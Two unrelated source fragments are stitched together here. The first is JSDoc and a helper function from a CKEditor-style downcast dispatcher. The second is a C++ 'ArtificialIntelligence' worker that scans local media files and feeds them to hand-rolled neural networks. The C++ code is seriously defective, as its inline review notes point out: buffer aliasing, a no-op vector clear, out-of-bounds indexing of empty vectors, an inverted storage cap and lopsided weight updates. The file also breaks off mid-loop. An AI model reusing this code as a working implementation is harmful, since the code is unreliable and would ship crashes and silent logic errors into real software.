* @param {module:engine/model/item~Item|module:engine/model/selection~Selection} data.item Item inside the new marker or
* the selection that is being converted.
* @param {module:engine/model/range~Range} [data.range] Range spanning over converted item. Available only in marker conversion, if
* the marker range was not collapsed.
* @param {module:engine/model/range~Range} data.markerRange Marker range.
* @param {String} data.markerName Marker name.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired when marker is removed from the model.
*
* `removeMarker` is a namespace for a class of events. Names of actually called events follow this pattern:
* `removeMarker:markerName`. By specifying certain marker names, you can make the events even more gradual. For example,
* if markers are named `foo:abc`, `foo:bar`, then it is possible to listen to `removeMarker:foo` or `removeMarker:foo:abc` and
* `removeMarker:foo:bar` events.
*
* @event removeMarker
* @param {Object} data Additional information about the change.
* @param {module:engine/model/range~Range} data.markerRange Marker range.
* @param {String} data.markerName Marker name.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
}
// Extend the dispatcher with the emitter interface so it can fire the events declared above.
mix( DowncastDispatcher, EmitterMixin );
// Helper function, checks whether change of `marker` at `modelPosition` should be converted. Marker changes are not
// converted if they happen inside an element with custom conversion method.
//
// @param {module:engine/model/position~Position} modelPosition
// @param {module:engine/model/markercollection~Marker} marker
// @param {module:engine/conversion/mapper~Mapper} mapper
// @returns {Boolean}
function shouldMarkerChangeBeConverted( modelPosition, marker, mapper ) {
	const markerRange = marker.getRange();

	// Ancestors of the position, without the root element (it cannot be passed to
	// `model.Range#containsItem`), ordered from the closest ancestor up.
	const ancestors = Array.from( modelPosition.getAncestors() ).slice( 1 ).reverse();

	for ( const element of ancestors ) {
		if ( !markerRange.containsItem( element ) ) {
			continue;
		}

		// An element with the `addHighlight` custom property has custom conversion -- skip the marker change.
		if ( mapper.toViewElement( element ).getCustomProperty( 'addHighlight' ) ) {
			return false;
		}
	}

	return true;
}
/**
* Conversion interface that is registered for given {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher}
* and is passed as one of parameters when {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher dispatcher}
* fires its events.
*
* @interface module:engine/conversion/downcastdispatcher~DowncastConversionApi
*/
/**
* The {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher} instance.
*
* @member {module:engine/conversion/downcastdispatcher~DowncastDispatcher} #dispatcher
*/
/**
* Stores information about what parts of processed model item are still waiting to be handled. After a piece of model item
* was converted, appropriate consumable value should be {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed}.
*
* @member {module:engine/conversion/modelconsumable~ModelConsumable} #consumable
*/
/**
* The {@link module:engine/conversion/mapper~Mapper} instance.
*
* @member {module:engine/conversion/mapper~Mapper} #mapper
*/
/**
* The {@link module:engine/model/schema~Schema} instance set for the model that is downcast.
*
* @member {module:engine/model/schema~Schema} #schema
*/
/**
* The {@link module:engine/view/downcastwriter~DowncastWriter} instance used to manipulate data during conversion.
*
* @member {module:engine/view/downcastwriter~DowncastWriter} #writer
*/
/**
* An object with an additional configuration which can be used during conversion process. Available only for data downcast conversion.
*
* @member {Object} #options
*/
|
#include "ArtificialIntelligence.h"

#include <bitset>
#include <fstream>
#include <iostream>
#include <random>
#include <string>
#include <thread>

#include <windows.h>

using namespace std;
//This constructor runs the Artificial Intelligence.
//This constructor runs the Artificial Intelligence.
//
//`count` is the ordinal of this AI instance; it becomes the 8-bit binary id
//string that also serves as the initial `updatedKey` (the worker loop runs
//while the two match).
ArtificialIntelligence::ArtificialIntelligence(int count) {
    id = std::bitset<8>(count).to_string();
    updatedKey = id;
    setupAI();
    // Launch the worker loop on a background thread. The original code wrote
    // `thread(Thread);`, which cannot bind a non-static member function without
    // an instance and -- had it constructed a joinable std::thread temporary --
    // would have called std::terminate() when that temporary was destroyed.
    // Bind `this` and detach so the constructor returns while the AI keeps
    // running; `Thread` exits on its own once `updatedKey` diverges from `id`.
    std::thread(&ArtificialIntelligence::Thread, this).detach();
    std::cout << "The AI " << id << " is running!!!" << std::endl;
}
//Background worker loop for this AI instance.
//
//Repeatedly:
// 1. scans the working directory for audio (.mp3), image (.png), text (.txt)
//    and video (.avi) data files,
// 2. decodes any new files and feeds them through the matching neural network,
//    caching up to 65536 input/output pairs as DataSet records,
// 3. scores each network's genomes and randomly nudges network weights by a
//    fitness-derived amount,
// 4. exits once `updatedKey` no longer equals this AI's `id` -- which this loop
//    itself triggers after 100 "stagnant" passes.
//
//NOTE(review): several suspicious constructs are flagged inline below. They are
//documented rather than changed because the intended behavior cannot be fully
//recovered from this file alone.
void ArtificialIntelligence::Thread() {
    cout << "The AI " << id << " is running!!!" << endl;
    int dataSetCount = 0;
    //NOTE(review): fd.cFileName is a buffer inside `fd` that FindNextFile
    //overwrites on every call, so every WCHAR* stored in these vectors aliases
    //the same storage -- copies (e.g. std::wstring) were probably intended.
    vector<WCHAR*> files;
    vector<WCHAR*> newFiles;
    //Load the files into the vector for the initial files.
    WIN32_FIND_DATA fd;
    //NOTE(review): FindFirstFile expects a wide search pattern such as L"*.mp3".
    //Casting a narrow literal with (LPCWSTR) reinterprets bytes instead of
    //converting to UTF-16, and ".mp3"/".png" also lack the '*' wildcard, so the
    //audio/image searches almost certainly fail -- TODO confirm.
    HANDLE audio = FindFirstFile((LPCWSTR)".mp3", &fd);
    HANDLE image = FindFirstFile((LPCWSTR)".png", &fd);
    HANDLE text = FindFirstFile((LPCWSTR)"*.txt", &fd);
    HANDLE video = FindFirstFile((LPCWSTR)"*.avi", &fd);
    int counter = 0;
    //Section boundaries inside the flat file list: [0, pointOne] audio,
    //(pointOne, pointTwo] image, (pointTwo, pointThree] text, rest video.
    int pointOne = 0;
    int pointTwo = 0;
    int pointThree = 0;
    int pointFour = 0;
    //NOTE(review): this is an else-if chain, so only the FIRST successful
    //search is enumerated per pass -- presumably all four sections were meant
    //to be collected. Also, only the `text` handle is ever FindClose'd; the
    //other three handles leak.
    if (audio != INVALID_HANDLE_VALUE) {
        do {
            newFiles.push_back(fd.cFileName);
            counter += 1;
        } while (FindNextFile(audio, &fd));
    } else if (image != INVALID_HANDLE_VALUE) {
        pointOne = counter;
        do {
            newFiles.push_back(fd.cFileName);
            counter += 1;
        } while (FindNextFile(image, &fd));
    } else if (text != INVALID_HANDLE_VALUE) {
        pointTwo = counter;
        do {
            newFiles.push_back(fd.cFileName);
            counter += 1;
        } while (FindNextFile(text, &fd));
        FindClose(text);
    } else if (video != INVALID_HANDLE_VALUE) {
        pointThree = counter;
        do {
            //NOTE(review): unlike the other sections, `counter` is not advanced
            //here, so pointFour ends up equal to pointThree -- TODO confirm.
            newFiles.push_back(fd.cFileName);
        } while (FindNextFile(video, &fd));
    }
    pointFour = counter;
    int initialSize = files.size();
    int count = files.size();
    //This runs the Artificial Intelligence until told otherwise.
    while (updatedKey == id) {
        /* --- Check for new data files for DynamicNetworkGenerator's text RNN, video/image CNN to build the network. --- */
        //NOTE(review): the handles were already exhausted by the enumeration
        //above, so these FindNextFile calls only yield entries created between
        //passes (if the handle semantics allow it at all) -- TODO confirm.
        if (audio != INVALID_HANDLE_VALUE) {
            do {
                newFiles.push_back(fd.cFileName);
                counter += 1;
            } while (FindNextFile(audio, &fd));
        } else if (image != INVALID_HANDLE_VALUE) {
            pointOne = counter;
            do {
                newFiles.push_back(fd.cFileName);
                counter += 1;
            } while (FindNextFile(image, &fd));
        } else if (text != INVALID_HANDLE_VALUE) {
            pointTwo = counter;
            do {
                newFiles.push_back(fd.cFileName);
                counter += 1;
            } while (FindNextFile(text, &fd));
            FindClose(text);
        } else if (video != INVALID_HANDLE_VALUE) {
            pointThree = counter;
            do {
                newFiles.push_back(fd.cFileName);
            } while (FindNextFile(video, &fd));
        }
        count = newFiles.size();
        //This generates Neural Networks for the AI or runs the data through the Neural network in the situation that there is new files.
        if ((initialSize - count) < 0) {
            files = newFiles;
            //NOTE(review): vector::empty() only TESTS for emptiness; clearing
            //the vector would be newFiles.clear(). As written this is a no-op
            //and the file list keeps growing. Same pattern recurs below for
            //neuronOne.
            newFiles.empty();
            /* --- Run data from section above through the appropriate Neural Network to generate a network if required. --- */
            for (int i = 0; i < files.size(); i++) {
                string line;
                ifstream fileInput;
                fileInput.open(files[i], ios::binary);
                int n = 1;
                int counting = 0;
                double count = 0.0; // shadows the outer `count`
                vector<double> audioData;
                vector<string> imageDataSub;
                vector<vector<double>> imageData;
                vector<double> textData;
                vector<string> videoDataSub;
                vector<vector<double>> videoData;
                if (i <= pointOne) {
                    //Audio section: decode each line as a binary number.
                    while (getline(fileInput, line)) {
                        //NOTE(review): j starts at line.size(), so the first read
                        //is line[size()] -- the '\0' terminator (valid but odd).
                        for (int j = line.size(); j >= 0; j--) {
                            if (line[j] == '1') {
                                count += n;
                            }
                            n *= 2;
                        }
                        n = 1;
                        //NOTE(review): dividing until the double underflows to
                        //exactly 0 destroys the value -- the pushed sample is
                        //always 0.0. A normalization like `while (count > 1)`
                        //was presumably intended. Same pattern recurs below.
                        while (count > 0) {
                            count /= 10;
                        }
                        audioData.push_back(count);
                    }
                } else if (i > pointOne && i <= pointTwo) {
                    //Image section: first two lines are header data, later lines
                    //are rows converted into `colour` vectors.
                    while (getline(fileInput, line)) {
                        if (counting == 2) {
                            imageDataSub.push_back(line);
                            vector<double> colour;
                            for (int j = 0; j < imageDataSub.size(); j++) {
                                //NOTE(review): the inner loop walks k over
                                //imageDataSub[j] but then tests line[j] -- one of
                                //the two subscripts looks wrong.
                                for (int k = imageDataSub[j].size(); k >= 0; k--) {
                                    if (line[j] == '1') {
                                        count += n;
                                    }
                                    n *= 2;
                                }
                                n = 1;
                                while (count > 0) {
                                    count /= 10;
                                }
                                colour.push_back(count);
                            }
                            imageData.push_back(colour);
                        }
                        else {
                            imageDataSub.push_back(line);
                            counting += 1;
                        }
                    }
                } else if (i > pointTwo && i <= pointThree) {
                    //Text section: same binary-string decoding as audio.
                    while (getline(fileInput, line)) {
                        for (int j = line.size(); j >= 0; j--) {
                            if (line[j] == '1') {
                                count += n;
                            }
                            n *= 2;
                        }
                        n = 1;
                        //NOTE(review): `count < 0` (all other branches use `> 0`)
                        //never runs for positive counts -- inconsistent.
                        while (count < 0) {
                            count /= 10;
                        }
                        textData.push_back(count);
                    }
                } else {
                    //Video section: same two-header-line scheme as image.
                    while (getline(fileInput, line)) {
                        if (counting == 2) {
                            videoDataSub.push_back(line);
                            vector<double> colour;
                            for (int j = 0; j < videoDataSub.size(); j++) {
                                for (int k = videoDataSub[j].size(); k >= 0; k--) {
                                    if (line[j] == '1') {
                                        count += n;
                                    }
                                    n *= 2;
                                }
                                n = 1;
                                while (count > 0) {
                                    count /= 10;
                                }
                                colour.push_back(count);
                            }
                            videoData.push_back(colour);
                        }
                        else {
                            videoDataSub.push_back(line);
                            counting += 1;
                        }
                    }
                }
                /* --- Feed the appropriate data files into the appropriate existing neural network if required and fetch any appropriate data from the Core's memory matrix. --- */
                //NOTE(review): this inner `i` shadows the file index above, and
                //its bound is textData.size() while the branches compare against
                //the FILE-section boundaries pointOne..pointThree -- the loop
                //variable and bound look mismatched.
                for (int i = 0; i < textData.size(); i++) {
                    if (i <= pointOne) {
                        _audioNetwork->feedFoward(audioData);
                        /* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
                        if (dataSetCount <= 65536) {
                            DataSet *ds = new DataSet();
                            ds->id = bitset<16>(dataSetCount).to_string();
                            ds->memoryMatrixInputS = audioData;
                            ds->memoryMatrixOutput = _audioNetwork->output;
                            dataSets.push_back(ds);
                            dataSetCount += 1;
                        }
                    } else if (i > pointOne && i <= pointTwo) {
                        for (int j = 0; j < imageData.size(); j++) {
                            _imageNetwork->feedFoward(imageData[j]);
                        }
                        /* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
                        if (dataSetCount <= 65536) {
                            DataSet *ds = new DataSet();
                            ds->id = bitset<16>(dataSetCount).to_string();
                            ds->memoryMatrixInputL = imageData;
                            ds->memoryMatrixOutput = _imageNetwork->output;
                            dataSets.push_back(ds);
                            dataSetCount += 1;
                        }
                    } else if (i > pointTwo && i <= pointThree) {
                        _textNetwork->feedFoward(textData);
                        /* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
                        //NOTE(review): `>=` here while the other branches use
                        //`<=` -- this stores only AFTER the cap is reached,
                        //which is surely inverted.
                        if (dataSetCount >= 65536) {
                            DataSet *ds = new DataSet();
                            ds->id = bitset<16>(dataSetCount).to_string();
                            ds->memoryMatrixInputS = textData;
                            ds->memoryMatrixOutput = _textNetwork->output;
                            dataSets.push_back(ds);
                            dataSetCount += 1;
                        }
                    } else {
                        for (int j = 0; j < videoData.size(); j++) {
                            _videoNetwork->feedFoward(videoData[j]);
                        }
                        /* --- Store the output data from the neural networks above into the AI's Core's memory matrix if required. --- */
                        if (dataSetCount <= 65536) {
                            DataSet *ds = new DataSet();
                            ds->id = bitset<16>(dataSetCount).to_string();
                            ds->memoryMatrixInputL = videoData;
                            ds->memoryMatrixOutput = _videoNetwork->output;
                            dataSets.push_back(ds);
                            dataSetCount += 1;
                        }
                    }
                }
            }
        }
        vector<vector<vector<string>>> networkGenomes;
        /* --- Check on the performance of the neural networks. --- */
        //Collect each tracked network's genome dump, choosing the network by the
        //same section boundaries as above.
        for (int i = 0; i < networkDetails.size(); i++) {
            if (i <= pointOne) {
                networkGenomes.push_back(_audioNetwork->performance());
            } else if (i > pointOne && i <= pointTwo) {
                networkGenomes.push_back(_imageNetwork->performance());
            } else if (i > pointTwo && i <= pointThree) {
                networkGenomes.push_back(_textNetwork->performance());
            } else {
                networkGenomes.push_back(_videoNetwork->performance());
            }
        }
        //Run a fitness test on the networks.
        //Each genome character contributes a fixed score (the scores match the
        //popcount of hex digits '1'..'A').
        vector<vector<vector<int>>> fitnessScore;
        vector<vector<vector<string>>> Genomes;
        for (int i = 0; i < networkGenomes.size(); i++) {
            vector<vector<int>> fitnessScoreOne;
            vector<vector<string>> GenomesOne;
            for (int j = 0; j < networkGenomes[i].size(); j++) {
                vector<int> fitnessScoreTwo;
                vector<string> GenomesTwo;
                for (int k = 0; k < networkGenomes[i][j].size(); k++) {
                    string genome = networkGenomes[i][j][k];
                    int score = 0;
                    for (int l = 0; l < genome.size(); l++) {
                        switch (genome[l]) {
                        case '1':
                            score += 1;
                            break;
                        case '2':
                            score += 1;
                            break;
                        case '3':
                            score += 2;
                            break;
                        case '4':
                            score += 1;
                            break;
                        case '5':
                            score += 2;
                            break;
                        case '6':
                            score += 2;
                            break;
                        case '7':
                            score += 3;
                            break;
                        case '8':
                            score += 1;
                            break;
                        case '9':
                            score += 2;
                            break;
                        case 'A':
                            score += 2;
                            break;
                        }
                    }
                    fitnessScoreTwo.push_back(score);
                    GenomesTwo.push_back(genome);
                }
                fitnessScoreOne.push_back(fitnessScoreTwo);
                GenomesOne.push_back(GenomesTwo);
            }
            Genomes.push_back(GenomesOne);
            fitnessScore.push_back(fitnessScoreOne);
        }
        //Calculate the performance of the network.
        vector<vector<double>> data; //Network, Node.
        vector<vector<double>> targets; //Network, Target.
        vector<double> neuron;
        vector<double> neuronOne;
        double sum = 0.0;
        //NOTE(review): `data` and `targets` are declared empty and never filled,
        //so data[i] / targets[i] below index out of bounds (undefined behavior).
        //They presumably should be populated from the stored DataSets -- TODO.
        for (int i = 0; i < networkDetails.size(); i++) {
            neuron = data[i];
            //Manually propagate `neuron` through every layer/node of network i,
            //dispatching on the node kind (ANN / RNN / LSTM).
            for (int j = 0; j < networkDetails[i]->network->m_layer.size(); j++) {
                for (int k = 0; k < networkDetails[i]->network->m_layer[j].size(); k++) {
                    if (networkDetails[i]->network->m_layer[j][k]->_ann == true) {
                        //Dense (ANN) node: weighted sum of the incoming vector.
                        for (int l = 0; l < neuron.size(); l++) {
                            if (l == 0 && j == 0) {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward.size(); m++) {
                                    neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward[m].weight);
                                }
                            } else {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward.size(); m++) {
                                    neuronOne[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->ann->weightsFoward[m].weight;
                                }
                            }
                        }
                        //NOTE(review): `k++` mutates the loop counter as a side
                        //effect of this comparison (skipping the next node), and
                        //the equality only holds one past the end anyway --
                        //`k + 1 == size()` was probably intended. Recurs below.
                        if (k++ == networkDetails[i]->network->m_layer[j].size()) {
                            for (int l = 0; l < neuronOne.size(); l++) {
                                neuronOne[l] = activationFunction(neuronOne[l]);
                            }
                            neuron = neuronOne;
                            neuronOne.empty();
                        }
                    } else if (networkDetails[i]->network->m_layer[j][k]->_rnn == true) {
                        //Recurrent (RNN) node: weighted sum, then a recurrent
                        //weighting pass followed by activation.
                        for (int l = 0; l < neuron.size(); l++) {
                            if (l == 0 && j == 0) {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward.size(); m++) {
                                    neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward[m].weight);
                                }
                            } else {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward.size(); m++) {
                                    neuronOne[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->rnn->weightsFoward[m].weight;
                                }
                            }
                        }
                        if (k++ == networkDetails[i]->network->m_layer[j].size()) {
                            for (int l = 0; l < 2; l++) {
                                for (int m = 0; m < neuronOne.size(); m++) {
                                    if (l == 0) {
                                        neuronOne[m] *= networkDetails[i]->network->m_layer[j][k]->rnn->weightsRecurrent[m].weight;
                                    } else {
                                        //NOTE(review): `*=` with the activation
                                        //result -- the ANN branch assigns instead.
                                        neuronOne[m] *= activationFunction(neuronOne[m]);
                                    }
                                }
                                if (l == 1) {
                                    neuron = neuronOne;
                                    neuronOne.empty();
                                }
                            }
                        }
                    } else if (networkDetails[i]->network->m_layer[j][k]->_lstm == true) {
                        //LSTM node: forward weighting, then a gate computation
                        //combining cell state, recurrent weights and biases.
                        for (int l = 0; l < neuron.size(); l++) {
                            if (l == 0 && j == 0) {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward.size(); m++) {
                                    neuronOne.push_back(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward[m].weight);
                                }
                            } else {
                                for (int m = 0; m < networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward.size(); m++) {
                                    //NOTE(review): accumulates into `neuron`
                                    //while the ANN/RNN branches accumulate into
                                    //`neuronOne` -- looks like a typo.
                                    neuron[m] += neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsFoward[m].weight;
                                }
                            }
                        }
                        double cell = 0.0;
                        double prevCell = 1.0;
                        for (int l = 0; l < neuron.size(); l++) {
                            if (l == 0 && j == 0) {
                                cell = activationFunction((neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[0].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[0].weight*neuron[l]));
                                cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[0].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[1].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[1].weight*neuron[l]));
                                cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[1].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[2].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[2].weight*neuron[l]));
                                neuronOne.push_back(activationFunction(cell) * networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[2].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[3].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[3].weight*neuron[l])));
                            } else {
                                prevCell = cell;
                                cell = activationFunction((neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[0].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[0].weight*neuron[l]));
                                cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[0].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[1].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[1].weight*neuron[l]));
                                cell *= networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[1].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[2].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[2].weight*neuron[l]));
                                neuronOne[l] += activationFunction(cell) * networkDetails[i]->network->m_layer[j][k]->lstm->sigmoidFunction((networkDetails[i]->network->m_layer[j][k]->lstm->weightCell[2].weight*prevCell)*(neuron[l] * networkDetails[i]->network->m_layer[j][k]->lstm->weightsRecurrent[3].weight)*(networkDetails[i]->network->m_layer[j][k]->lstm->lstmBiases[3].weight*neuron[l]));
                            }
                        }
                        if (k++ == networkDetails[i]->network->m_layer[j].size()) {
                            neuron = neuronOne;
                            neuronOne.empty();
                        }
                    }
                }
            }
            //Compare the propagated output against this network's targets; an
            //output within 0.1 of its target counts as accurate.
            vector<double> delta;
            for (int j = 0; j < targets[i].size(); j++) {
                delta.push_back(targets[i][j] - neuron[j]);
            }
            vector<int> accurracy;
            for (int j = 0; j < delta.size(); j++) {
                if (delta[j] <= 0.1) {
                    accurracy.push_back(1);
                } else {
                    accurracy.push_back(0);
                }
            }
            int halfway = 0;
            if (networkDetails[i]->network->m_layer.size() % 2 == 0) {
                halfway = networkDetails[i]->network->m_layer.size() / 2;
            } else {
                //NOTE(review): integer arithmetic -- the `+ 0.5` is truncated
                //away, so both branches compute size() / 2.
                halfway = (networkDetails[i]->network->m_layer.size() / 2) + 0.5;
            }
            int count = 0;
            for (int j = 0; j < accurracy.size(); j++) {
                if (accurracy[j] == 1) {
                    count += 1;
                }
            }
            //Record whether at least half of this network's outputs were on
            //target. NOTE(review): `change` is only ever appended to; it likely
            //should be cleared at the start of each pass -- TODO confirm.
            if (count >= halfway) {
                change.push_back(1);
            } else {
                change.push_back(0);
            }
        }
        //Find the best weight for the neuron.
        string parentS;
        int parentI;
        int networkCount = 0;
        double updatingWeights;
        for (int i = 0; i < fitnessScore.size(); i++) {
            for (int j = 0; j < fitnessScore[i].size(); j++) {
                //Pick the fittest genome of this layer as the "parent".
                parentS = Genomes[i][j][0];
                parentI = fitnessScore[i][j][0];
                for (int k = 0; k < fitnessScore[i][j].size(); k++) {
                    if (parentI < fitnessScore[i][j][k]) {
                        parentI = fitnessScore[i][j][k];
                        parentS = Genomes[i][j][k];
                    }
                }
                //Squash the best fitness into (0, 1): (p / (p + 1)) squared.
                updatingWeights = (double)parentI;
                updatingWeights = updatingWeights / (updatingWeights + 1);
                updatingWeights *= updatingWeights;
                //Update the appropriate networks with the updatingWeights value.
                //Each eligible weight is nudged up or down by that amount with
                //a 50/50 coin flip.
                if (i <= pointOne) {
                    if (_audioNetwork->m_layer[i][j]->_ann == true) {
                        if (change[i] == 1) {
                            for (int k = 0; k < _audioNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _audioNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    _audioNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                        }
                    } else if (_audioNetwork->m_layer[i][j]->_rnn == true) {
                        if (change[i] == 1) {
                            for (int k = 0; k < _audioNetwork->m_layer[i][j]->rnn->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _audioNetwork->m_layer[i][j]->rnn->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    _audioNetwork->m_layer[i][j]->rnn->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                            for (int k = 0; k < _audioNetwork->m_layer[i][j]->rnn->weightsRecurrent.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _audioNetwork->m_layer[i][j]->rnn->weightsRecurrent[k].weight += updatingWeights;
                                } else {
                                    _audioNetwork->m_layer[i][j]->rnn->weightsRecurrent[k].weight -= updatingWeights;
                                }
                            }
                        }
                    }
                } else if (i > pointOne && i <= pointTwo) {
                    if (change[i] == 1) {
                        for (int k = 0; k < _imageNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
                            if (rand() % 2 == 0) {
                                _imageNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
                            } else {
                                _imageNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
                            }
                        }
                    }
                } else if (i > pointTwo && i <= pointThree) {
                    if (change[i] == 1) {
                        if (_textNetwork->m_layer[i][j]->_ann == true) {
                            for (int k = 0; k < _textNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _textNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    _textNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                        } else if (_textNetwork->m_layer[i][j]->_lstm == true) {
                            for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _textNetwork->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    _textNetwork->m_layer[i][j]->lstm->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                            for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightsRecurrent.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _textNetwork->m_layer[i][j]->lstm->weightsRecurrent[k].weight += updatingWeights;
                                } else {
                                    _textNetwork->m_layer[i][j]->lstm->weightsRecurrent[k].weight -= updatingWeights;
                                }
                            }
                            for (int k = 0; k < _textNetwork->m_layer[i][j]->lstm->weightCell.size(); k++) {
                                if (rand() % 2 == 0) {
                                    _textNetwork->m_layer[i][j]->lstm->weightCell[k].weight += updatingWeights;
                                } else {
                                    _textNetwork->m_layer[i][j]->lstm->weightCell[k].weight -= updatingWeights;
                                }
                            }
                        }
                    }
                } else if (i > pointThree && i <= pointFour) {
                    if (change[i] == 1) {
                        for (int k = 0; k < _videoNetwork->m_layer[i][j]->ann->weightsFoward.size(); k++) {
                            if (rand() % 2 == 0) {
                                _videoNetwork->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
                            } else {
                                _videoNetwork->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
                            }
                        }
                    }
                } else {
                    //Networks tracked via networkDetails (beyond the four fixed
                    //sections).
                    if (change[i] == 1) {
                        if (networkDetails[networkCount]->network->m_layer[i][j]->_ann == true) {
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    networkDetails[networkCount]->network->m_layer[i][j]->ann->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                        } else if (networkDetails[networkCount]->network->m_layer[i][j]->_rnn == true) {
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsFoward[k].weight -= updatingWeights;
                                }
                            }
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent.size(); k++) {
                                if (rand() % 2 == 0) {
                                    networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent[k].weight += updatingWeights;
                                } else {
                                    networkDetails[networkCount]->network->m_layer[i][j]->rnn->weightsRecurrent[k].weight -= updatingWeights;
                                }
                            }
                        } else if (networkDetails[networkCount]->network->m_layer[i][j]->_lstm == true) {
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward.size(); k++) {
                                if (rand() % 2 == 0) {
                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
                                } else {
                                    //NOTE(review): both branches ADD here; every
                                    //other weight update subtracts in its else
                                    //branch -- `-=` was almost certainly meant.
                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsFoward[k].weight += updatingWeights;
                                }
                            }
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent.size(); k++) {
                                if (rand() % 2 == 0) {
                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent[k].weight += updatingWeights;
                                } else {
                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightsRecurrent[k].weight -= updatingWeights;
                                }
                            }
                            for (int k = 0; k < networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell.size(); k++) {
                                if (rand() % 2 == 0) {
